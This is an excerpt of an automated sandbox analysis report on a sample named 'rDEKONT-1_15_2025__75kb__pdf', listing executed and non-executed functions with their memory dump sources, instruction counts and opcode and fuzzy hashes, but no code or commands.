                                                                                                                • Instruction ID: 19277d13070759648570e9a5f4b970343f68beddc05692be516b90af33a791e2
                                                                                                                • Opcode Fuzzy Hash: d046fdf3d3f33db2e7b872c43b3ea45d6380303f5227a0f78ed5e6ebaa6cbd6e
                                                                                                                • Instruction Fuzzy Hash: 8321D135300A118BE7259A2AC45493EB7A3FF89661705817AE90ADB3A4CF31DC02CB80
                                                                                                                Function 0142D118 Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500088466.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_142d000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e6f4970b1c034fd1a0aa6ff5c789ac1fc840d82a3fa07be02d2618cf313ca2a
                                                                                                                • Instruction ID: fe645840b7f6e82d3b4abf33342d24b1b6260d195a0a086e5eda563315fffd04
                                                                                                                • Opcode Fuzzy Hash: 0e6f4970b1c034fd1a0aa6ff5c789ac1fc840d82a3fa07be02d2618cf313ca2a
                                                                                                                • Instruction Fuzzy Hash: EF213771904340DFDB05DF58C9C0B26BB65FB84314F70C56EE8094B766C37AD486CA62
                                                                                                                Function 01475649 Relevance: .1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3b2948dd54dbabc946979284c4b20170da3c6de9c0fbd6742fef138df9e31672
                                                                                                                • Instruction ID: 6461f0dd80f6777fea18813cfb7e9491945a780f419896535fa1bcdbe35a8e8d
                                                                                                                • Opcode Fuzzy Hash: 3b2948dd54dbabc946979284c4b20170da3c6de9c0fbd6742fef138df9e31672
                                                                                                                • Instruction Fuzzy Hash: 9521D1316092499FCB15AF69E4446BF7BB2FB59220F10407AE8098F369CB79CE51CB91
                                                                                                                Function 01479761 Relevance: .1, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 860d35e31c448895ebde3d273418db4692df6f50d949ccc94441a9cb497b1742
                                                                                                                • Instruction ID: 389bda2148c91f411d0e7431ab2fb0613c7d2db54ada2ba077279ebeef79a52a
                                                                                                                • Opcode Fuzzy Hash: 860d35e31c448895ebde3d273418db4692df6f50d949ccc94441a9cb497b1742
                                                                                                                • Instruction Fuzzy Hash: FA217A30E01249DFCB15CFA9D550AEEBFB6EF48228F24806AE401F63A4DB35D941CB60
                                                                                                                Function 014762F0 Relevance: .1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cc444c3ef0d4091cfcb704e2b401304415daa875189bfde65831b8e887105fef
                                                                                                                • Instruction ID: 682c4ba1832f8b6531cf6a4fb8ff16dab8ce3ec57dde767bcfdb30897e862462
                                                                                                                • Opcode Fuzzy Hash: cc444c3ef0d4091cfcb704e2b401304415daa875189bfde65831b8e887105fef
                                                                                                                • Instruction Fuzzy Hash: 9711A335705A118FE7269A2AD45457EBBA3BFC566131A40BAE906CB3B4CF31CC02CB90
                                                                                                                Function 01476FC7 Relevance: .1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5debddc1b79ab7216701344a50b43d405b107d690a846b644bad8b4f925d1e13
                                                                                                                • Instruction ID: 1f7186372af38ae4ec6bbc8469cfe1d8a3a33f5df1141ce467b320cac17ec703
                                                                                                                • Opcode Fuzzy Hash: 5debddc1b79ab7216701344a50b43d405b107d690a846b644bad8b4f925d1e13
                                                                                                                • Instruction Fuzzy Hash: D6117975900248DFCB26CF58C848FEBBBF6EB48311F80C46AE5199B222D3759944CF90
                                                                                                                Function 0141D54F Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500035962.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_141d000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                • Instruction ID: ca239f7c25481505afb6b04553d285f2934aeae15ef214c209d51146fd63d07a
                                                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                • Instruction Fuzzy Hash: F011E1B6904280CFCB06CF44D5C4B16BF71FB88314F24C5AAD9090B26BC33AD45ACBA2
                                                                                                                Function 0147F31F Relevance: .1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5d6a94f141ebc0f9580ef7d2bd7459e937f7f53eb54bf46d75ebeb5f2ba2c83c
                                                                                                                • Instruction ID: 587edc674ce43318c44935d0f1977ea08f5a2c0b54bc8a09cc9bede4103f9e0c
                                                                                                                • Opcode Fuzzy Hash: 5d6a94f141ebc0f9580ef7d2bd7459e937f7f53eb54bf46d75ebeb5f2ba2c83c
                                                                                                                • Instruction Fuzzy Hash: 2C211A70D001099FCB59EFA9D540A9EBFF5FB45300F1085BAC018A7225EB789E49CF81
                                                                                                                Function 0147F320 Relevance: .1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4f560b68f8142508418f87a78bedf243dc1ae6c23acb260f8f1ff7fef5ed6d2d
                                                                                                                • Instruction ID: db113c27ab9038186c39f3a35dbbda0e4299e4b58e156563027405482b504991
                                                                                                                • Opcode Fuzzy Hash: 4f560b68f8142508418f87a78bedf243dc1ae6c23acb260f8f1ff7fef5ed6d2d
                                                                                                                • Instruction Fuzzy Hash: 351129709001099FCB19EFA9D540A9EBFF5FB44300F4085BAC018AB265EB789E49CF81
                                                                                                                Function 0142D113 Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500088466.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_142d000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                • Instruction ID: 96c420ccd6a8dee9d73063a1dfd03dc2cf328133166524f129b8fdf610a5059d
                                                                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                • Instruction Fuzzy Hash: 56118E75904280DFDB06CF54D9C4B26BF61FB84314F24C6AAD9494B767C33AD44ACB62
                                                                                                                Function 014727F9 Relevance: .1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 497996d8a206025d75979dcca9a1342c61f7341031f5b82efa1bdf0c649823cc
                                                                                                                • Instruction ID: eb93e5e0b85f853fee437854ac189f7ca8ba807fd619b37f291f64dc353bd284
                                                                                                                • Opcode Fuzzy Hash: 497996d8a206025d75979dcca9a1342c61f7341031f5b82efa1bdf0c649823cc
                                                                                                                • Instruction Fuzzy Hash: B7119EB4D0120ACFCB50EFA9D5445EEBBF0FB59314F10926AD905B2224EB355A85CBA1
                                                                                                                Function 01475EA7 Relevance: .0, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4d8453589b00e0f725d77315b7ef99108bef8ad56d6c2bddd294858a1d6f56cb
                                                                                                                • Instruction ID: 13f5164048a7effa19fb4b84abba516b59159965976a29cb25aa8a6f1a16d937
                                                                                                                • Opcode Fuzzy Hash: 4d8453589b00e0f725d77315b7ef99108bef8ad56d6c2bddd294858a1d6f56cb
                                                                                                                • Instruction Fuzzy Hash: 8101A7327001196F9B559E599800AFF3FE7EBD8660B14C02AF905DB298CAB18D118790
                                                                                                                Function 0147ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4f15dcf0ac78c17cdb8e54589dc570efe10e883dbae3960f4b69fd5a9185966c
                                                                                                                • Instruction ID: 4168de920a0801cad0f66856a8628ff9cb6716cfa4f22a17e2e7ab3bbecaac7e
                                                                                                                • Opcode Fuzzy Hash: 4f15dcf0ac78c17cdb8e54589dc570efe10e883dbae3960f4b69fd5a9185966c
                                                                                                                • Instruction Fuzzy Hash: 58F0F6313002109F97265A2E9454A6FBBDEEFC8A6532D407BEA09CB371EE70CC038381
                                                                                                                Function 0147E8F7 Relevance: .0, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df8008633816c563fc839122f2d595b8b6fff5e3dcb791cdc202b6ccdee5d5a6
                                                                                                                • Instruction ID: ef3df3a3d494d77bd8827b6e8a7d6247eb2b1ba37e0affa612d43877d3cc6b31
                                                                                                                • Opcode Fuzzy Hash: df8008633816c563fc839122f2d595b8b6fff5e3dcb791cdc202b6ccdee5d5a6
                                                                                                                • Instruction Fuzzy Hash: 0101C478D002099FDB51CFA8E445AEEBBB1FB49300F10856AE914B3350D7795E55CF91
                                                                                                                Function 01479C2F Relevance: .0, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a9bf54eea3a8eb3c6c52ce4b55b4cb74b7617fc953ce2e4ecbeb9abb89d2d943
                                                                                                                • Instruction ID: fa42ba2228ad5c0692854cfdfcda7b77bb0bf64013c374165e25fd19f0143465
                                                                                                                • Opcode Fuzzy Hash: a9bf54eea3a8eb3c6c52ce4b55b4cb74b7617fc953ce2e4ecbeb9abb89d2d943
                                                                                                                • Instruction Fuzzy Hash: B9F01C31A102189FDF55DF69D808AEEBBF5EBC8335F10C026E918D7214D7714A158B90
                                                                                                                Function 014728A2 Relevance: .0, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 291bf806c18ec806c1a16c44fa3646add2570383ada7e829e29e8d8701e91f94
                                                                                                                • Instruction ID: 33734c09e945728b4be13374c38c8d0992c45d2bc9784ab8c97915c2dcff55e8
                                                                                                                • Opcode Fuzzy Hash: 291bf806c18ec806c1a16c44fa3646add2570383ada7e829e29e8d8701e91f94
                                                                                                                • Instruction Fuzzy Hash: 33E08636D50227D6CB11E7B19C040EEB734ADE1221B54461BD12536150FF70265986E2
                                                                                                                Function 014728B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3745db617dcb283b3ab85ca59aa1883ef2ddbf8c6b60291d94beee6e0438e8ae
                                                                                                                • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                                                • Opcode Fuzzy Hash: 3745db617dcb283b3ab85ca59aa1883ef2ddbf8c6b60291d94beee6e0438e8ae
                                                                                                                • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                                Function 01478EF7 Relevance: .0, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f255b97794516dba69d57e9f5d05b2626321e312ebced539ba35cd5e2c6ae9f0
                                                                                                                • Instruction ID: 3469b95b072114fd74791f2730e81f33cc673719bd25d032fe4b8f539ba55a42
                                                                                                                • Opcode Fuzzy Hash: f255b97794516dba69d57e9f5d05b2626321e312ebced539ba35cd5e2c6ae9f0
                                                                                                                • Instruction Fuzzy Hash: 8FC08C33A4C2242EE779404D7C48EFBAB9DD3C13B4B21023BFA1CE331198624C8242A4
                                                                                                                Function 0147AFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 70386123637ecf1e9937dd95c5f8ca9e25733a8401aa3c73831840b703cf25a2
                                                                                                                • Instruction ID: 9c84a48da976abb5b186e1b2ed993c283ab151fbcd5a4999913e605ed9f67c0a
                                                                                                                • Opcode Fuzzy Hash: 70386123637ecf1e9937dd95c5f8ca9e25733a8401aa3c73831840b703cf25a2
                                                                                                                • Instruction Fuzzy Hash: 98D0673AB401189FCB149F98E8808DDFB76FB98321B048116E915A3265C6319965DB50
                                                                                                                Function 01476747 Relevance: .0, Instructions: 12COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c8728979380f807f0e5eb584504632788a154fb384a2c4dcb10948abd42fc6ee
                                                                                                                • Instruction ID: d9b17028b1b2d9d2b6d412d05cddf70b24ce0530d387629d1cfe7e8f6ff20ff7
                                                                                                                • Opcode Fuzzy Hash: c8728979380f807f0e5eb584504632788a154fb384a2c4dcb10948abd42fc6ee
                                                                                                                • Instruction Fuzzy Hash: 96D0C9304403094ECB89EF65F955869377EFBA0214B208A359006165ADDFBD4D498B40
                                                                                                                Function 01476748 Relevance: .0, Instructions: 12COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 554b176db5425a2546895f5652011a8a26a27071aa78580dde9a95a0951f177f
                                                                                                                • Instruction ID: dbf576968ade430fc00d3cefb628e454002482d761c0a21f4e6fb8d08d12935a
                                                                                                                • Opcode Fuzzy Hash: 554b176db5425a2546895f5652011a8a26a27071aa78580dde9a95a0951f177f
                                                                                                                • Instruction Fuzzy Hash: 04C012300443094EC689FF65FD55915372EFB90214B5089309006065ADEFBD5D498794

                                                                                                                Non-executed Functions

                                                                                                                Function 06D10040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .5uq
                                                                                                                • API String ID: 0-910421107
                                                                                                                • Opcode ID: 607c2d37dadbcc0738612437a77198b511c78e99fb3b76e9772c437563e2db34
                                                                                                                • Instruction ID: b8936624e504df6685d80dbe88b357d05c33fb580d866a652f51919601a62baa
                                                                                                                • Opcode Fuzzy Hash: 607c2d37dadbcc0738612437a77198b511c78e99fb3b76e9772c437563e2db34
                                                                                                                • Instruction Fuzzy Hash: 7452AC74E01229CFDB64DF69D884B9DBBB2BF89300F1085EAD409AB254DB759E81CF50
                                                                                                                Function 0147F630 Relevance: .3, Instructions: 294COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 30b8320b46cd3c3cabb022ac61e4a226084fbe56bb509d0d3780fb549a29272a
                                                                                                                • Instruction ID: 39ef1083557e544f6ad31ca7cce586d301fc7d7bf1be568322710dbe58f572cd
                                                                                                                • Opcode Fuzzy Hash: 30b8320b46cd3c3cabb022ac61e4a226084fbe56bb509d0d3780fb549a29272a
                                                                                                                • Instruction Fuzzy Hash: EFD1AF74E01218CFDB54DFA9D944B9DBBB2BF89300F1090AAD819AB265DB345E85CF50
                                                                                                                Function 06DBF4A8 Relevance: .3, Instructions: 292COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08589ddea268a7bae92edea106252bc129e2db515f7c4fa99a4c6fb81bdbadb9
                                                                                                                • Instruction ID: 238016febeb8003dda3572a6e64d1077af5024b5de7e042ead059a6ff816fc2e
                                                                                                                • Opcode Fuzzy Hash: 08589ddea268a7bae92edea106252bc129e2db515f7c4fa99a4c6fb81bdbadb9
                                                                                                                • Instruction Fuzzy Hash: 52D19D74E01218CFDB54DFA5D984BADBBB2FF89300F1091A9D409AB2A4DB359E85CF50
                                                                                                                Function 06DBE650 Relevance: .3, Instructions: 292COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f8a39991cfbc4eb44054e378ec629d7e8ff0d3718d3492cc6480bea14689fdc7
                                                                                                                • Instruction ID: ff1f34453c20596f5338ea4a1da9c617cf38b949617564da332e7895b6478a45
                                                                                                                • Opcode Fuzzy Hash: f8a39991cfbc4eb44054e378ec629d7e8ff0d3718d3492cc6480bea14689fdc7
                                                                                                                • Instruction Fuzzy Hash: 6ED1AD74E01218CFDB54DFA5D984BADBBB6FF88300F1091A9D409AB2A4DB349E85CF50
                                                                                                                Function 06DBEFE0 Relevance: .3, Instructions: 292COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 31c0029f2538064f937828b969ef531f2988eed3bae506ba646d701fbddc11fb
                                                                                                                • Instruction ID: f2bf9c37905f20e6a88934531d49ac4bbb61c9621091f89e0a37e133dc3426ba
                                                                                                                • Opcode Fuzzy Hash: 31c0029f2538064f937828b969ef531f2988eed3bae506ba646d701fbddc11fb
                                                                                                                • Instruction Fuzzy Hash: B1D19C74E01218CFDB54DFA5D984BADBBB2FF89300F1091A9D409AB2A4DB359E85CF50
                                                                                                                Function 06DBE188 Relevance: .3, Instructions: 292COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 285ec8b1c61b627e97c3b8e044889a9e1aa726df2f604c2f0b89639430b45f87
                                                                                                                • Instruction ID: ae406f929dc2844a86a97168b03fdaab0a93acc5963a769031a8a11c97b23795
                                                                                                                • Opcode Fuzzy Hash: 285ec8b1c61b627e97c3b8e044889a9e1aa726df2f604c2f0b89639430b45f87
                                                                                                                • Instruction Fuzzy Hash: 6AD19D74E01218CFDB54DFA5D984BADBBB2FF89300F1090A9D419AB2A4DB349E85CF50
                                                                                                                Function 06DBF970 Relevance: .3, Instructions: 292COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c89a1678b59d6b0e49791c2ee775269336eeda185d41f008a204b98d83743f96
                                                                                                                • Instruction ID: 0202f2886ec8a1095e79c4725725f89ae59ec4db2233cc6e0607864edf2598fd
                                                                                                                • Opcode Fuzzy Hash: c89a1678b59d6b0e49791c2ee775269336eeda185d41f008a204b98d83743f96
                                                                                                                • Instruction Fuzzy Hash: 7BD19D74E01218CFDB54DFA5D984BADBBB2FF89300F1091A9D409AB2A4DB359E85CF50
                                                                                                                Function 06DBEB18 Relevance: .3, Instructions: 292COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ae2ee35c8b1c1ab435acb030de30db501c9b1ade2c6970e935d01218fafdf36b
                                                                                                                • Instruction ID: 88dac008565ceca8672ef9adf4bc4209d3c575bcfb6696c6bb9172388e4795a1
                                                                                                                • Opcode Fuzzy Hash: ae2ee35c8b1c1ab435acb030de30db501c9b1ade2c6970e935d01218fafdf36b
                                                                                                                • Instruction Fuzzy Hash: EBD19C74E01218CFDB54DFA5D984BADBBB2FF89300F1091A9D409AB2A4DB359E85CF50
                                                                                                                Function 0147FA8B Relevance: .3, Instructions: 290COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
